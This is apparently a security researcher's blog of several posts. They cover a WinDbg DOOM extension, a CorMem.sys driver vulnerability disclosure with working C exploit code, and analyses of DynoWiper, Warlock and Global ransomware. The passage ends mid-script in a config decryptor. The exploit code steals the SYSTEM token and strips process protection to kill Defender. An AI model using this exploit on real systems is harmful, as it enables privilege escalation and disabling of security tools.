• What?
• How?
• Acknowledgment

What?

For anyone that has used WinDbg, you might have found yourself automating tedious analysis tasks through scripts written in JavaScript, or compiled extensions, like drvtrace from eversinc33 for example. While reading guides on writing extensions, I came across this post by Kevin Gosse on writing WinDbg extensions in C# and building them using NativeAOT so they can be loaded in WinDbg, and what better first extension to build than a playable version of DOOM?

How?

Under the hood, the extension uses Managed Doom by Nobuaki Tanaka for all gameplay logic, including loading the DOOM IWAD, running the actual game, and producing each rendered frame, with the only exception being audio, which is completely disabled.

The extension handles everything between Managed Doom and WinDbg, such as the initialization logic so WinDbg can actually load it, handling commands and passing control to the main game loop, frame conversion to text, and forwarding user inputs to the game to make it “playable”.

[UnmanagedCallersOnly(EntryPoint = "doom")]
public static int Doom(IntPtr client, IntPtr argsPtr)
{
    try
    {
        using var output = new DbgEngOutput(client);
        string args = Marshal.PtrToStringAnsi(argsPtr) ?? string.Empty;
        args = args.Trim();

        if (args.Length == 0 || args == "?" || args == "/?" || args == "-?" || args == "help")
        {
            PrintHelp(output);
            return 0;
        }

        DoomHost.Run(args, output);
        return 0;
    }
    catch
    {
        return 1;
    }
}

Frames from Managed Doom are converted into text by outputting the frame into a 640x400 RGBA buffer, binning the pixels into a smaller grid based on the selected resolution (default is 160x50, I use 240x75), averaging the brightness of each character cell, and mapping it to a character from the following selection .'`,:;-+*#%@&$. Finally, each converted frame is outputted to the command window as text.

for (int row = 0; row < _charsH; row++)
{
    int yStart = (int)((long)row * _srcH / _charsH);
    int yEnd = (int)((long)(row + 1) * _srcH / _charsH);
    if (yEnd <= yStart) yEnd = yStart + 1;

    for (int col = 0; col < _charsW; col++)
    {
        int xStart = (int)((long)col * _srcW / _charsW);
        int xEnd = (int)((long)(col + 1) * _srcW / _charsW);
        if (xEnd <= xStart) xEnd = xStart + 1;

        int sum = 0;
        int count = 0;
        for (int x = xStart; x < xEnd; x++)
        {
            int colBase = x * _srcH * 4;
            for (int y = yStart; y < yEnd; y++)
            {
                int p = colBase + y * 4;
                sum += source[p] + source[p + 1] + source[p + 2];
                count++;
            }
        }

        int idx = (int)((long)sum * rampLen / (count * 3 * 256));
        if (idx > rampLast) idx = rampLast;
        _sb.Append(Ramp[idx]);
    }
    _sb.Append('\n');
}

User inputs are captured each tick and pressed keys are tracked using GetAsyncKeyState, which are then converted to game key codes. Input is only forwarded to the game when WinDbg or one of its close relatives is the active focused window.

public List<DoomEvent> Poll()
{
    Array.Copy(_curr, _prev, _curr.Length);
    Array.Clear(_curr, 0, _curr.Length);

    if (ShouldAcceptInput())
    {
        for (int vk = 1; vk < 256; vk++)
        {
            if (vk == 0x10 || vk == 0x11 || vk == 0x12) continue;
            short s = GetAsyncKeyState(vk);
            if ((s & 0x8000) == 0) continue;

            DoomKey k = DoomKeyMap.FromVk(vk, 0, false);
            if (k != DoomKey.Unknown)
            {
                _curr[(int)k] = true;
            }
        }
    }

    var edges = new List<DoomEvent>();
    for (int i = 0; i < _curr.Length; i++)
    {
        if (_curr[i] != _prev[i])
        {
            edges.Add(new DoomEvent(
                _curr[i] ? EventType.KeyDown : EventType.KeyUp, (DoomKey)i));
        }
    }
    return edges;
}

The project can be found here: https://github.com/t0asts/windbg-doom
A video showing gameplay can be found here: https://www.youtube.com/watch?v=lDo061NRSHg

Acknowledgment

Feedback and corrections are welcome.

• Overview
• IOCs
• Analysis
• Exploit
• Acknowledgment

Overview

In this post I’m going over my analysis of the Sapera Memory Manager driver “CorMem.sys” from Teledyne Digital Imaging, which exposes physical memory read/write functionality to usermode through IOCTLs that are controllable from an unprivileged context. This allows an unprivileged user to elevate to SYSTEM, or to strip PPL protection from a process and terminate it (also mapping unsigned drivers and much more). Additionally, the driver does load and is abusable on Windows 11 with HVCI and the MS vulnerable driver blocklist enabled.

POC can be found here: https://github.com/t0asts/cormemterminator

IOCs

SHA-256: 40c855d20d497823716a08a443dc85846233226985ee653770bc3b245cf2ed0f

Analysis

The primary flaw allowing for unprivileged abuse of the driver, is the insecure device object creation. The device is created with no explicit security descriptor (DACL) and the DeviceCharacteristics parameter set to NULL rather than something like FILE_DEVICE_SECURE_OPEN.

Without a restrictive DACL, the device inherits a default security descriptor that grants GENERIC_READ | GENERIC_WRITE to all authenticated users (including our unprivileged one). Also, without FILE_DEVICE_SECURE_OPEN in DeviceCharacteristics, the I/O manager only enforces the device’s security descriptor on opens to the device object itself, opens to all other paths of the device namespace (\\.\CORMEM\foobar) bypass the check entirely. Combined with the default DACL, any unprivileged user can open a handle and issue IOCTLs.

The first target IOCTL is 0x22200c (IOCTL_MAP), which calls a handler function that accepts a user supplied physical address and length. These values are then passed to the actual map function.

The map function opens \Device\PhysicalMemory via ZwOpenSection with SECTION_ALL_ACCESS (0xF001F), calls ObReferenceObjectByHandle on the section, maps the requested physical range into the calling process via ZwMapViewOfSection and returns the mapped virtual address to us in usermode. It should be noted there is NO validation of the requested physical address or length, any physical address range can be mapped.

The second target IOCTL is 0x222010 (IOCTL_UNMAP), which as the name implies, allows us to unmap a previously mapped physical memory region. The unmap function accepts a virtual address and calls ZwUnmapViewOfSection, unmapping the provided region.

The third target IOCTL is 0x22201C (IOCTL_V2P), which accepts a kernel virtual address (KVA) from usermode and calls MmGetPhysicalAddress against it, returning the physical address. Once again, it should be noted there is NO validation that the address belongs to the calling process.

Between these three IOCTLs we have enough to weaponize it.

Exploit

The POC allows an unprivileged user to terminate protected processes, or elevate to SYSTEM, but how?

First we need to setup some helper functions to simplify the process of translating virtual addresses to physical, and reading & writing physical memory.

static BOOL KRead(ULONGLONG kva, void* buf, DWORD size)
{
	ULONGLONG physAddr = VirtToPhys(kva);

	if (!physAddr)
		return FALSE;

	ULONGLONG pageOffset = physAddr & 0xFFF;
	ULONGLONG pageBase = physAddr - pageOffset;
	ULONGLONG mapSize = (pageOffset + size + 0xFFF) & ~0xFFFULL;

	PVOID mapped = MapPhys(pageBase, mapSize);

	if (!mapped)
		return FALSE;

	memcpy(buf, (BYTE*)mapped + pageOffset, size);
	UnmapPhys(mapped);

	return TRUE;
}

static BOOL KWrite(ULONGLONG kva, void* buf, DWORD size)
{
	ULONGLONG physAddr = VirtToPhys(kva);

	if (!physAddr)
		return FALSE;

	ULONGLONG pageOffset = physAddr & 0xFFF;
	ULONGLONG pageBase = physAddr - pageOffset;
	ULONGLONG mapSize = (pageOffset + size + 0xFFF) & ~0xFFFULL;

	PVOID mapped = MapPhys(pageBase, mapSize);

	if (!mapped)
		return FALSE;

	memcpy((BYTE*)mapped + pageOffset, buf, size);
	UnmapPhys(mapped);

	return TRUE;
}

Next, the base address for ntoskrnl.exe must be discovered, since it is randomized by KASLR on boot. This can be done on Windows 10 to pre-24H2 Windows 11 using NtQuerySystemInformation and the SystemModuleInformation (11) flag, which returns ntoskrnl.exe as the first module.

For Windows 11 versions post-24H2, this won’t work. Instead we can scan the entire kernel image region in 2 MB steps, starting from 0xFFFFF80000000000, and ending at 0xFFFFF80800000000. Each address is tested with VirtToPhys, where unmapped pages return 0, and the mapped pages we do find can be read with KRead. Each mapped page we can successfully read is checked for a valid PE header with the following markers to identify ntoskrnl.exe:

• MZ “magic” signature (0x5A4D)
• Valid PE signature (0x00004550)
• PE32+ optional header (0x20B)
• Native subsystem (IMAGE_SUBSYSTEM_NATIVE == 1)
• Large image size (> 0x500000)

static ULONGLONG GetNtoskrnlBaseQSI()
{
	auto NtQSI = (fnNtQSI)GetProcAddress(GetModuleHandleA("ntdll"), "NtQuerySystemInformation");

	ULONG length = 0;

	NtQSI(SystemModuleInformation, NULL, 0, &length);

	if (!length)
		return 0;

	auto* modules = (MODULE_LIST*)malloc(length);

	if (!modules)
		return 0;

	if (NtQSI(SystemModuleInformation, modules, length, &length)) {
		free(modules);
		return 0;
	}

	ULONGLONG base = (ULONGLONG)modules->Modules[0].ImageBase;

	free(modules);

	return base;
}

static ULONGLONG GetNtoskrnlBaseVAScan()
{
	const ULONGLONG VA_START = 0xFFFFF80000000000ULL;
	const ULONGLONG VA_END = 0xFFFFF80800000000ULL;
	const ULONGLONG STEP = 0x200000;

	for (ULONGLONG va = VA_START; va < VA_END; va += STEP) {
		if (!VirtToPhys(va))
			continue;

		USHORT magic = 0;

		if (!KRead(va, &magic, 2) || magic != 0x5A4D)
			continue;

		BYTE hdr[0x200] = {};

		if (!KRead(va, hdr, sizeof(hdr)))
			continue;

		LONG peOffset = *(LONG*)(hdr + 0x3C);

		if (peOffset < 0 || peOffset + 0x78 >(LONG)sizeof(hdr))
			continue;

		if (*(DWORD*)(hdr + peOffset) != 0x00004550)
			continue;

		BYTE* optHdr = hdr + peOffset + 24;

		if (*(USHORT*)optHdr != 0x20B)
			continue;

		DWORD sizeOfImage = *(DWORD*)(optHdr + 56);
		USHORT subsystem = *(USHORT*)(optHdr + 68);

		if (subsystem == 1 && sizeOfImage > 0x500000)
			return va;
	}

	return 0;
}

With the base address for ntoskrnl.exe found, we need to locate the System EPROCESS address so we can use it as an entry point into the kernel’s process list. We can walk this process list through the ActiveProcessLinks field, which is a doubly-linked list chaining the EPROCESS structures for processes together, which will allow us to strip protections from target processes, or steal the token from a process.

To find our entry point, PsInitialSystemProcess can be used, which provides a global pointer that references the EPROCESS of the System process, and is exported. We can resolve PsInitialSystemProcess by loading a local copy of ntoskrnl.exe via LoadLibraryEx, calling GetProcAddress to find the export offset, and add it to our kernel base address.

static ULONGLONG FindKernelExport(ULONGLONG kernelBase, const char* name)
{
	HMODULE local = LoadLibraryExA("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);

	if (!local)
		return 0;

	auto localAddr = (ULONGLONG)GetProcAddress(local, name);

	ULONGLONG offset = localAddr ? localAddr - (ULONGLONG)local : 0;

	FreeLibrary(local);

	return offset ? kernelBase + offset : 0;
}

static ULONGLONG GetSystemEprocess()
{
	ULONGLONG kernelBase = GetNtoskrnlBase();

	if (!kernelBase)
		return 0;

	ULONGLONG pPsInitial = FindKernelExport(kernelBase, "PsInitialSystemProcess");

	if (!pPsInitial)
		return 0;

	ULONGLONG eprocess = KReadPtr(pPsInitial);

	if (!eprocess || (DWORD)KReadPtr(eprocess + g_off.Pid) != 4)
		return 0;

	return eprocess;
}

Now that we can find the EPROCESS structure for any target process by PID, we can find the structure for our process, and manipulate the token. To elevate our unprivileged user, we can read the Token field from the System EPROCESS and overwrite our current process’s Token field with the System token value. We can now enable SeDebugPrivilege via AdjustTokenPrivileges with no issues now, and spawn our new cmd.exe process as SYSTEM (if using elevate option).

static ULONGLONG FindEprocess(ULONGLONG systemEproc, DWORD targetPid)
{
	ULONGLONG current = systemEproc;

	for (int iter = 0; iter < 4096; iter++) {
		if ((DWORD)KReadPtr(current + g_off.Pid) == targetPid)
			return current;

		ULONGLONG flink = KReadPtr(current + g_off.Links);
		ULONGLONG next = flink - g_off.Links;

		if (!flink || next == systemEproc)
			break;

		current = next;
	}

	return 0;
}

static BOOL StealSystemToken(ULONGLONG systemEproc)
{
	ULONGLONG myEproc = FindEprocess(systemEproc, GetCurrentProcessId());

	if (!myEproc)
		return FALSE;

	ULONGLONG systemToken = KReadPtr(systemEproc + g_off.Token);

	if (!KWrite(myEproc + g_off.Token, &systemToken, 8))
		return FALSE;

	EnableDebugPriv();

	return TRUE;
}

static BOOL EnableDebugPriv()
{
	HANDLE token;

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token))
		return FALSE;

	LUID luid;

	LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &luid);

	TOKEN_PRIVILEGES privs = {};

	privs.PrivilegeCount = 1;
	privs.Privileges[0].Luid = luid;
	privs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	BOOL ok = AdjustTokenPrivileges(token, FALSE, &privs, sizeof(privs), NULL, NULL);

	ok = ok && GetLastError() == ERROR_SUCCESS;

	CloseHandle(token);

	return ok;
}

static int CmdElevate(ULONGLONG systemEproc)
{
	if (!StealSystemToken(systemEproc))
		return 1;

	STARTUPINFOA si = { sizeof(si) };
	PROCESS_INFORMATION pi = {};

	if (CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {
		printf("SYSTEM cmd.exe PID %lu\n", pi.dwProcessId);

		CloseHandle(pi.hProcess);
		CloseHandle(pi.hThread);
	}
	else {
		printf("CreateProcess failed: %lu\n", GetLastError());
	}

	return 0;
}

To terminate processes, we can use the elevation logic from above to swap our process token, but protected (PPL/PP) processes will require additional effort to terminate. Since this driver does not expose an IOCTL that allows control over ZwTerminateProcess we will have to strip the protections off the target process before we can touch it. We can do this by finding our target’s EPROCESS, and zeroing the fields SignatureLevel, SectionSignatureLevel, and Protection. We are now privileged enough to open a handle to our now unprotected target process with OpenProcess, but in the case of Windows Defender’s MsMpEng.exe process (and others), the WdFilter.sys filter driver strips PROCESS_TERMINATE from our access mask (GrantedAccess) on handle creation through ObRegisterCallbacks, which is used to intercept calls to ObpCreateHandle. To circumvent this, we can open a handle with PROCESS_QUERY_LIMITED_INFORMATION, which is allowed, and manually adjust the access rights. By locating our process’s _HANDLE_TABLE via EPROCESS+ObjectTable, walking the handle table structure to find the handle entry for our created PROCESS_QUERY_LIMITED_INFORMATION handle, and OR in the PROCESS_TERMINATE access rights to our access mask. We can now successfully terminate the process with TerminateProcess.

static int CmdKill(ULONGLONG systemEproc, DWORD targetPid)
{
	if (!StealSystemToken(systemEproc))
		return 1;

	ULONGLONG myEproc = FindEprocess(systemEproc, GetCurrentProcessId());
	ULONGLONG tgtEproc = FindEprocess(systemEproc, targetPid);

	if (!tgtEproc) {
		printf("Target EPROCESS not found\n");
		return 1;
	}

	char imageName[16] = {};

	KRead(tgtEproc + g_off.Name, imageName, 15);

	KWriteByte(tgtEproc + g_off.SigLevel, 0);
	KWriteByte(tgtEproc + g_off.SecSigLevel, 0);
	KWriteByte(tgtEproc + g_off.Protection, 0);

	HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, targetPid);

	if (!hProcess) {
		printf("OpenProcess failed: %lu\n", GetLastError());
		return 1;
	}

	if (!GrantHandleAccess(myEproc, hProcess, PROCESS_TERMINATE)) {
		CloseHandle(hProcess);
		return 1;
	}

	if (!TerminateProcess(hProcess, 1)) {
		printf("TerminateProcess failed: %lu\n", GetLastError());
		CloseHandle(hProcess);
		return 1;
	}

	CloseHandle(hProcess);
	printf("Process %lu (%s) terminated\n", targetPid, imageName);
	return 0;
}

static ULONGLONG LookupHandleEntry(ULONGLONG eprocess, HANDLE handle)
{
	ULONGLONG objTable = KReadPtr(eprocess + g_off.ObjTable);

	if (!objTable)
		return 0;

	ULONGLONG tableCode = KReadPtr(objTable + 0x08);
	ULONG level = (ULONG)(tableCode & 3);
	ULONGLONG tableBase = tableCode & ~7ULL;
	ULONG index = ((ULONG)(ULONG_PTR)handle) >> 2;

	if (level == 0)
		return tableBase + (ULONGLONG)index * 16;

	if (level == 1) {
		ULONG pageIndex = index / ENTRIES_PER_PAGE;
		ULONG entryIndex = index % ENTRIES_PER_PAGE;
		ULONGLONG subTable = KReadPtr(tableBase + (ULONGLONG)pageIndex * 8);

		return subTable ? subTable + (ULONGLONG)entryIndex * 16 : 0;
	}

	if (level == 2) {
		ULONG topIndex = index / (ENTRIES_PER_PAGE * ENTRIES_PER_PAGE);
		ULONG midIndex = (index / ENTRIES_PER_PAGE) % ENTRIES_PER_PAGE;
		ULONG entryIndex = index % ENTRIES_PER_PAGE;

		ULONGLONG midTable = KReadPtr(tableBase + (ULONGLONG)topIndex * 8);

		if (!midTable)
			return 0;

		ULONGLONG subTable = KReadPtr(midTable + (ULONGLONG)midIndex * 8);

		return subTable ? subTable + (ULONGLONG)entryIndex * 16 : 0;
	}

	return 0;
}

static BOOL GrantHandleAccess(ULONGLONG eprocess, HANDLE handle, DWORD rights)
{
	ULONGLONG entry = LookupHandleEntry(eprocess, handle);

	if (!entry)
		return FALSE;

	DWORD accessBits = 0;

	KRead(entry + 8, &accessBits, 4);

	accessBits |= rights;

	KWrite(entry + 8, &accessBits, 4);

	return TRUE;
}

Acknowledgment

Feedback and corrections are welcome.

• Overview
• IOCs
• Initial Inspection
• PRNG Setup
• Data Corruption
• Data Deletion
• MITRE ATT&CK Mapping
• Acknowledgment

Overview

In this post I’m going over my analysis of DynoWiper, a wiper family that was discovered during attacks against Polish energy companies in late December of 2025. ESET Research and CERT Polska have linked the activity and supporting malware to infrastructure and tradecraft associated with Russian state-aligned threat actors, with ESET assessing the campaign as consistent with operations attributed to Russian APT Sandworm, who are notorious for attacking Ukrainian companies and infrastructure, with major incidents spanning throughout years 2015, 2016, 2017, 2018, and 2022. For more insight into Sandworm or the chain of compromise leading up to the deployment of DynoWiper, ESET and CERT Polska published their findings in great detail, and I highly recommend reading them for context.

IOCs

The sample analyzed in this post is a 32-bit Windows executable, and is version A of DynoWiper.

SHA-256: 835b0d87ed2d49899ab6f9479cddb8b4e03f5aeb2365c50a51f9088dcede68d5

Initial Inspection

To start, I ran the binary straight through DIE (Detect It Easy) catch any quick wins regarding packing or obfuscation, but this sample does not appear to utilize either (unsurprising for wiper malware). To IDA we go!

Figure 1: Detect It Easy

PRNG Setup

Jumping right past the CRT setup to the WinMain function, DynoWiper first initializes a Mersenne Twister PRNG (MT19937) context, with the fixed seed value of 5489 and a state size of 624.

Figure 2: Main Function

Figure 3: Mersenne Twister Init

The MT19937 state is then re-seeded and reinitialized with a random value generated using std::random_device, the 624 word state is rebuilt, and a 16-byte value is generated.

Figure 4: Mersenne Twister Seed

Data Corruption

Immediately following the PRNG setup, the data corruption logic is executed.

Figure 5: Data Corruption Logic

Drives attached to the target host are enumerated with GetLogicalDrives(), and GetDriveTypeW() is used to identify the drive type, to ensure only fixed or removable drives are added to the target drive vector.

Figure 6: Drive Enumeration

Directories and files on said target drives are walked recursively using FindFirstFileW() and FindNextFileW(), while skipping the following protected / OS directories to avoid instability during the corruption process.

Figures 7-8: Directory Traversal

For each applicable file, attributes are cleared with SetFileAttributesW(), and a handle to the file is created using CreateFileW(). The file size is obtained using GetFileSize(), and the start of the file located through SetFilePointerEx(). A 16 byte junk data buffer derived from the PRNG context is written to the start of the file using WriteFile(). In cases where the file size exceeds 16 bytes, pseudo-random locations throughout the file are generated, with the count determined by the file size, and a maximum count of 4096. The current file pointer is again repositioned to each generated location with SetFilePointerEx(), and the same 16 byte data buffer is written again, continuing the file corruption process.

Figure 9: Random File Offset Generation

Figure 10: File Corruption

Data Deletion

With all the target files damaged and the data corruption process complete, the data deletion process begins.

Figure 11: Data Deletion Logic

Similar to the file corruption process, drives attached to the target host are enumerated, target directories are walked recursively and target files are removed with DeleteFileW() instead of writing junk data, as seen in the file corruption logic.

Figure 12: File Deletion

To finish, the wiper obtains its own process token using OpenProcessToken(), enables SeShutdownPrivilege through AdjustTokenPrivileges(), and issues a system reboot with ExitWindowsEx().

Figure 13: Token Modification and Shutdown

MITRE ATT&CK Mapping

• Discovery (TA0007)
  • T1680: Local Storage Discovery
  • T1083: File and Directory Discovery
• Defense Evasion (TA0005)
  • T1222: File and Directory Permissions Modification
    • T1222.001: Windows File and Directory Permissions Modification
  • T1134: Access Token Manipulation
• Privilege Escalation (TA0004)
  • T1134: Access Token Manipulation
• Impact (TA0040)
  • T1485: Data Destruction
  • T1529: System Shutdown/Reboot

Acknowledgment

Feedback and corrections are welcome.

Many thanks to the SANS ISC for crossposting my analysis!

• Overview
• IOCs
• Initial Inspection
• Safety Check
• Emptying Recycle Bin
• Prepare Target Drives
• Impair Defenses
• WOW Check
• Delete VSS Snapshots
• Worker Thread Setup
• Query Target Drives
• File Encryption Process
• Dropping Ransom Note
• MITRE ATT&CK Mapping
• Acknowledgment

Overview

In this post I’m going over my analysis of a Warlock ransomware sample, a family that has emerged as a result of the recent on-prem SharePoint chained RCE vulnerability (“ToolShell”) that has become a fan favorite of threat groups, a notable one being Storm-2603, who are compromising internet-facing on-prem SharePoint servers, and deploying the Warlock ransomware (via software deployment GPO) once they have moved laterally throughout target environments. I am not covering the deserialization or path traversal SharePoint vulnerabilities in post (yet), so for more info about those I recommend heading to Kaspersky’s post.

IOCs

The sample analyzed in this post is a 32-bit Windows console app executable.

Group Sites:
hxxp://elqfbcx5nofwtqfookqml7ltx2g6q6tmddys6e25vgu3al2meim6cbqd[.]onion
hxxp://zfytizegsze6uiswodhbaalyy5rawaytv2nzyzdkt3susbewviqqh7yd[.]onion

SHA-256: da8de7257c6897d2220cdf9d4755b15aeb38715807e3665716d2ee761c266fdb

Initial Inspection

Getting started, I dropped the binary straight into DIE (Detect It Easy) and lucky for me, this sample was NOT packed or obfuscated with a commercial software protector (presumably dropped by a loader or initial stage that is packed/obfuscated), so time to open it in IDA.

Figure 1: Detect It Easy

Skipping past the CRT setup to the main function, the first thing the ransomware does is detach the console window, to hide execution from the user (very subtle).

Figure 2: Hide Console Window

Safety Check

The computer name is retrieved and checked against a hardcoded hostname (potentially to avoid infecting the developer or affiliates), but this build appears to have the placeholder hostname. If the hostname of the target system matches the whitelisted entry, execution is halted. If the hostname is unable to be retrieved, the hostname check is skipped.

Figure 3: Whitelisted Host Check

Emptying Recycle Bin

The actual malicious code is now fired off now. First the shutdown priority is set to delay termination in the event of a system shutdown, and the system recycle bin is cleared silently (no confirmation, no progress indicator, no sound).

Figure 4: Set Shutdown Params and Clear Recycle Bin

Prepare Target Drives

Next, the list of NTFS volumes is queried, and any volume that is unmapped is assigned one, so the ransomware can access and encrypt non-system drives for maximum impact.

Figure 5: Mount Unmapped Volumes to Unused Drive Letters

Impair Defenses

To prevent interference during the encryption process, backup software and security software services are stopped, starting with dependent services, and eventually the main list of target services. Services that are already stopped or pending shutdown are skipped to avoid infinite service control request looping.

Figure 6: Targeted Services

Figures 7-8: Security and Backup Services Stopped

With services terminated, processes related to security software, backup software, database software, and productivity software are also terminated. This serves to release file locks held by these processes, and to avoid interruption by AV or EDR software when encrypting files.

Figure 9: Target Processes

Figure 10: Security and Backup Processes Terminated

WOW Check

If the ransomware process is running under WOW64 (Windows-On-Windows 64), which it will if run on a 64-bit version of Windows (the binary is 32-bit), WOW64 file system redirection is temporarily disabled, so the ransomware can access the System32 folder, and avoid being redirected to the SysWOW64 folder.

Delete VSS Snapshots

To hinder recovery efforts, all VSS snapshots are enumerated and forcibly deleted through COM instead of the much noisier vssadmin or wmic equivalents, to avoid leaving command line argument activity behind.

Figure 11: Disable WOW64 FS Redirection and Delete VSS Snapshots

Worker Thread Setup

Before encrypting files, the local processors on the target host are queried and multiplied by eight, to determine how many worker threads the ransomware will create.

Figure 12: Create Worker Threads

The worker threads will now wait for batches of target paths for encryption.

Query Target Drives

Each drive mapped to a drive letter is queried for the drive type, to exclude those that are CD-ROM “drives” and any drives that point to an invalid volume, to avoid erroring out when processing paths for the worker threads.

Figure 13: Query Drive Type

For the remaining applicable drives, the directory structure is recursively walked starting from the root to create batches of files that will be handled by the worker threads for encryption. Any files or directories that match against hardcoded exclusion lists for extensions and path names will be skipped from being added to the file batches.

Figure 14: Excluded Files and Directories

Figure 15: Excluded Extensions

Figures 16-17: Walking Directory Structure

In addition to drives, any accessible SMB shares are enumerated and processed to ensure files on shares are also added to the batches for encryption.

Figure 18: Enumerate Shares

File Encryption Process

For each batch of files (~50), worker threads begin the file encryption process. Each file in the batch is renamed to include .x2anylock trailing the original extension. If during the renaming process a file is locked, the offending process will be forcibly terminated.

Figures 19-20: Append Group Extension

Figure 21: Terminate Locking Processes

Every file uses a per-file symmetric ChaCha key derived via X25519 elliptic curve Diffie-Hellman exchange between a newly generated ephemeral private key on the target host and an embedded 32 byte public key. The 32 byte shared secret is hashed using SHA-256 to produce the 32 byte content key. The 8 byte nonce is the first 8 bytes of SHA-256 (key). The file is then encrypted (either in place when -e is passed as an argument, or after appending the extension .x2anylock), and a footer containing the ephemeral public key + 16-byte hash result (SHA-256(iv)[:16]) + fixed 32 byte marker is appended so the decryptor can recompute the key for file recovery.

Figures 22-25: File Encryption

Figure 26: Embedded Public Key

Dropping Ransom Note

The embedded ransom note is dropped alongside encrypted files throughout the duration of the process.

Figures 27-28: Drop Ransom Note

As the encryption for the file batches completes successfully, the worker threads will be killed off and the ransomware process is terminated.

Overall nothing new nothing special.

MITRE ATT&CK Mapping

• Collection (TA0009)
  • T1005: Data from Local System
• Defense Evasion (TA0005)
  • T1562: Impair Defenses
    • T1562.001: Disable or Modify Tools
• Discovery (TA0007)
  • T1007: System Service Discovery
  • T1057: Process Discovery
  • T1063: Security Software Discovery
  • T1082: System Information Discovery
  • T1083: File and Directory Discovery
  • T1135: Network Share Discovery
  • T1518: Software Discovery
    • T1518.001: Security Software Discovery
• Execution (TA0002)
  • T1059: Command and Scripting Interpreter
  • T1106: Native API
  • T1129: Shared Modules
• Impact (TA0040)
  • T1486: Data Encrypted for Impact
  • T1489: Service Stop
  • T1490: Inhibit System Recovery

Acknowledgment

Feedback and corrections are welcome.

• Overview
• IOCs
• Initial Inspection
• API Resolution
• Mutex Creation
• Emptying Recycle Bin
• Config Decryption
• Crypto Context Setup
• Custom File Icon Setup
• Print Ransom Note
• Clear Windows Event Log
• Delete Shadow Copies
• Token Elevation
• Impersonate SYSTEM
• Impair Defenses
• Enumerate Domain Devices
• Remote Execution
• Local Encryption Setup
• Local Encryption Start
• Remote Encryption Start
• Set Desktop Wallpaper
• Self Deletion
• MITRE ATT&CK Mapping
• Related Samples
• Acknowledgment

Overview

In this post, I’m going over my analysis of a recent Global ransomware sample, a group that I only discovered when someone shared a promotional video they created with me. The video is oddly polished and visually almost resembles an advertisement Apple would release during a new product launch. They also boast about having support for ESXi systems and networked storage devices. There are some other bold claims, such as, one-click propagation across networks, “mount mode” (encrypting remote disks locally), “new attacks every single day”, 85% revenue share, AI-powered negotiation support, and access to their platform on mobile devices. Affiliate groups are supposedly allowed to post on their leak site without intervention. The video alone made me curious about the capabilities of their “product” so that is how we arrived here.

Post Analysis Note: The Global ransomware group operates utilizing the leaked Mamona ransomware builder (can be confirmed by the created mutex), which has ties to the Blacklock ransomware group also referred to “El Dorado” (before they were shut down by the DragonForce group). The DragonForce group utilizes the leaked Lockbit3.0 and ContiV3 variants (very original).

IOCs

The sample analyzed in this post is a 32-bit Windows executable.

Group Site: hxxp://vg6xwkmfyirv3l6qtqus7jykcuvgx6imegb73hqny2avxccnmqt5m2id[.]onion

MD5: c5a8d4c07e1dca5e9cfbbaadfc402063  

SHA-1: c95056c8682373d0512aea2ed72c18f79c854308  

SHA-256: 13b82f4ac62faf87a105be355c82bacfcbdd383050860dfa93dfbb7bb2e6c9ba

Initial Inspection

Before opening the sample in IDA, I dropped it into DIE (Detect It Easy) to get an idea if I was going to be spending most of my time unpacking or deobfuscating the sample. This was NOT the case at all, as the affiliates behind this sample shipped a clean release build out the door.

Figure 1: Detect It Easy  

There was no obvious obfuscation, and it was unpacked. Loading the file in IDA and heading straight to the entry point, we see all the usual C runtime setup. We can skip past all of these to the actual main function.

Figure 2: Entry Point  

Here is where the actual important execution starts.

Figure 3: Main Function  

There are a handful of interesting flags that can be set on execution, -log can be passed to view the verbose event logging, -detached will forcibly detach the console window if the encryptor is run interactively, -force will bypass the mutex check which prevents multiple instances of the encryptor from running simultaneously to prevent double encryption of files.

Interestingly enough, if -detached is not passed as an argument, the encryptor will attempt to relaunch and set the flag.

Figure 4: Detach Console and Relaunch  

After executing in detached mode, the handles for standard in, out, and error are set to NUL.

Figure 5: Set STDIN/STDOUT/STDERR to NUL  

API Resolution

The encryptor then will continue setup by dynamically resolving APIs with a custom hashing algorithm.

Figure 6: Resolve APIs  

The ResolveModule function calculates module hashes by first walking the PEB module list (InLoadOrderModuleList), lowercasing the module name, stripping the path off the file name, hashing the module name, and comparing it to the target hash.

If kernel32.dll, advapi32.dll, and shell32.dll successfully resolve, APIs will be resolved next.

The ResolveAPI function calculates API hashes by walking exported functions for the target module, calculating the hash for each entry, comparing it to the target hash, and returning the function address when a match is found.

This python snippet is a recreation of how the hash is generated from the API name.

#thanks hashdb
def hash(data): 
    hash_value = 0x42
    for b in data:
        hash_value = ((hash_value * 33) + b) & 0xFFFFFFFF
    return hash_value

print("CreateMutexW = " + str(hash(b'CreateMutexW')))

Mutex Creation

Once APIs have been resolved, the encryptor creates a mutex using the resolved CreateMutexW function.

Figure 7: Create Mutex  

Emptying Recycle Bin

Next, the recycle bin is cleared. This is the first of several steps to prevent recovery of encrypted files.

Figure 8: Clear Recycle Bin  

Config Decryption

The embedded config in the .config section is now decrypted. This config data contains the ransom note, victim unique ID, leak site URL, and the random value that will be used as the extension for encrypted files. Other runtime configuration options if present would be stored in this data as well.

Figure 9: Decrypted Config  

The following python script reimplements the decryption process, and can be used to extract the config section.

#!/usr/bin/env python3

import sys
from pathlib import Path
from array import array

import pefile

class ConfigDecryptor:
    def __init__(self, pe_path: Path) -> None:
        if not pe_path.exists():
            raise FileNotFoundError(f"File not found: {pe_path}")
        self.pe = pefile.PE(str(pe_path))

    def extract_config_section(self) -> bytes:
        for sec in self.pe.sections:
            name = sec.Name.rstrip(b"\x00").decode(errors="ignore")
            if name == ".config":
                return sec.get_data()
        raise RuntimeError(".config section not found")

    def decrypt_data(self, data: bytes) -> bytes:
        data = data[:len(data) // 4 * 4]
        words = array('I')
        words.frombytes(data)

        xor_current = xor_prev = xor_seed = 0x52D8FC7D

        for idx in range(len(words)):
            words[idx] ^= xor_current
            rot = ((xor_seed << 13) | (xor_prev >> 19)) & 0xFFFFFFFF
            new_key = ((-1702134675 & 0xFFFFFFFF) * rot) & 0xFFFFFFFF
            xor_current = xor_prev = xor_seed = new_key ^ 0x5E4F3D2C

        return words.tobytes()

    def process(self) -> None:
